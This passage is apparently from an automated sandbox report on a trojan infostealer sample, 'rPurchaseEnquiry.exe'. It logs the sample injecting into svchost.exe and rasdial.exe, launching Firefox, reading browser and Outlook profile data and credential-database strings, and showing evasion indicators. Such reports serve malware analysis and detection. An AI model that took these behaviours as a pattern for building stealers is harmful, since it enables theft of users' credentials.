                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524132D5_2_0524132D
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0517D34C5_2_0517D34C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051D739A5_2_051D739A
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051952A05_2_051952A0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052312ED5_2_052312ED
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051AB2C05_2_051AB2C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05247D735_2_05247D73
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05193D405_2_05193D40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05241D5A5_2_05241D5A
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051AFDC05_2_051AFDC0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05209C325_2_05209C32
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524FCF25_2_0524FCF2
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524FF095_2_0524FF09
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05191F925_2_05191F92
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524FFB15_2_0524FFB1
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05153FD55_2_05153FD5
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05153FD25_2_05153FD2
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05199EB05_2_05199EB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052259105_2_05225910
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051999505_2_05199950
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051AB9505_2_051AB950
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051FD8005_2_051FD800
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051938E05_2_051938E0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524FB765_2_0524FB76
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051AFB805_2_051AFB80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05205BF05_2_05205BF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051CDBF95_2_051CDBF9
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05203A6C5_2_05203A6C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05247A465_2_05247A46
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524FA495_2_0524FA49
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05231AA35_2_05231AA3
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051D5AA05_2_051D5AA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0523DAC65_2_0523DAC6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FB1DD05_2_02FB1DD0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FACE605_2_02FACE60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FAAE605_2_02FAAE60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FAAFB05_2_02FAAFB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FAAFA55_2_02FAAFA5
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FACC405_2_02FACC40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FACC375_2_02FACC37
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FB36A05_2_02FB36A0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FB369C5_2_02FB369C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FB54A05_2_02FB54A0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FCBC805_2_02FCBC80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04FAE64C5_2_04FAE64C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04FAD7185_2_04FAD718
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04FAE1945_2_04FAE194
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04FAE2B75_2_04FAE2B7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 110 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0517B970 appears 250 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 051C5130 appears 58 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 051D7E54 appears 110 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0520F290 appears 105 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 051FEA12 appears 86 times
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: String function: 00BB0AE3 appears 70 times
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: String function: 00B97DE1 appears 35 times
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: String function: 00BB8900 appears 42 times
                Source: rPurchaseEnquiry.exe, 00000000.00000003.1206441572.000000000432D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rPurchaseEnquiry.exe
                Source: rPurchaseEnquiry.exe, 00000000.00000003.1205053743.0000000004183000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rPurchaseEnquiry.exe
                Source: rPurchaseEnquiry.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/10
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFA06A GetLastError,FormatMessageW,0_2_00BFA06A
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BE81CB AdjustTokenPrivileges,CloseHandle,0_2_00BE81CB
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BE87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00BE87E1
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00BFB3FB
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C0EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C0EE0D
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00BFC397
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B94E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B94E89
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeFile created: C:\Users\user\AppData\Local\Temp\autECD3.tmpJump to behavior
                Source: rPurchaseEnquiry.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rasdial.exe, 00000005.00000002.3646734607.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3646734607.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1486557359.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3646734607.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1488865273.00000000033AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: rPurchaseEnquiry.exeReversingLabs: Detection: 38%
                Source: rPurchaseEnquiry.exeVirustotal: Detection: 46%
                Source: unknownProcess created: C:\Users\user\Desktop\rPurchaseEnquiry.exe "C:\Users\user\Desktop\rPurchaseEnquiry.exe"
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPurchaseEnquiry.exe"
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPurchaseEnquiry.exe"Jump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: rPurchaseEnquiry.exeStatic file information: File size 1187328 > 1048576
                Source: rPurchaseEnquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: rPurchaseEnquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: rPurchaseEnquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: rPurchaseEnquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: rPurchaseEnquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: rPurchaseEnquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: rPurchaseEnquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: rPurchaseEnquiry.exe, 00000000.00000003.1203442574.0000000004200000.00000004.00001000.00020000.00000000.sdmp, rPurchaseEnquiry.exe, 00000000.00000003.1205907538.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1209803857.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1207310111.0000000003400000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3648459343.00000000052EE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3648459343.0000000005150000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1308527422.0000000004DFB000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1310878759.0000000004FA1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000003.00000002.1308540176.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1275446554.000000000321A000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647058046.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000003.1245569343.0000000000E05000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: rPurchaseEnquiry.exe, 00000000.00000003.1203442574.0000000004200000.00000004.00001000.00020000.00000000.sdmp, rPurchaseEnquiry.exe, 00000000.00000003.1205907538.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1209803857.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1207310111.0000000003400000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000005.00000002.3648459343.00000000052EE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3648459343.0000000005150000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1308527422.0000000004DFB000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1310878759.0000000004FA1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000003.00000002.1308540176.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1275446554.000000000321A000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647058046.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000003.1245569343.0000000000E05000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.3649099627.000000000577C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000005.00000002.3646734607.0000000003329000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377348600.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1595013346.000000004026C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.3649099627.000000000577C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000005.00000002.3646734607.0000000003329000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377348600.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1595013346.000000004026C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3646389970.00000000009CF000.00000002.00000001.01000000.00000007.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377100890.00000000009CF000.00000002.00000001.01000000.00000007.sdmp
                Source: rPurchaseEnquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: rPurchaseEnquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: rPurchaseEnquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: rPurchaseEnquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: rPurchaseEnquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B94B37 LoadLibraryA,GetProcAddress,0_2_00B94B37
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB8945 push ecx; ret 0_2_00BB8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040C8F7 push edi; retf 3_2_0040C8FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D12C push ecx; iretd 3_2_0040D12F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402184 push edx; ret 3_2_00402187
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418248 push cs; ret 3_2_00418256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418248 push es; iretd 3_2_00418303
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418258 push es; iretd 3_2_00418303
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00404A5D pushad ; retf 3_2_00404A60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403230 push eax; ret 3_2_00403232
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041742E push ebp; ret 3_2_0041742F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041F573 push edx; ret 3_2_0041F61B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00404D06 push edx; retf 3_2_00404D08
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D63C push esi; ret 3_2_0040D648
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00404ECE push ds; ret 3_2_00404F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411760 push esi; iretd 3_2_00411784
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00404F34 push ds; ret 3_2_00404F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00413F34 push ecx; retf 4E92h3_2_0041403B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041179E push esi; iretd 3_2_00411784
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0380225F pushad ; ret 3_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038027FA pushad ; ret 3_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038309AD push ecx; mov dword ptr [esp], ecx3_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0380283D push eax; iretd 3_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03801368 push eax; iretd 3_2_03801369
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051527FA pushad ; ret 5_2_051527F9
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0515225F pushad ; ret 5_2_051527F9
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051809AD push ecx; mov dword ptr [esp], ecx5_2_051809B6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0515283D push eax; iretd 5_2_05152858
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05151368 push eax; iretd 5_2_05151369
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FBC3DE push edx; ret 5_2_02FBC3E8
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FBC340 push edx; ret 5_2_02FBC3E8
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FB41FB push ebp; ret 5_2_02FB41FC
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B948D7
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C15376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C15376
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB3187
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeAPI/Special instruction interceptor: Address: 17D3224
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF9105CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E rdtsc 3_2_0387096E
                Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9789Jump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105060
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 7456Thread sleep count: 183 > 30Jump to behavior
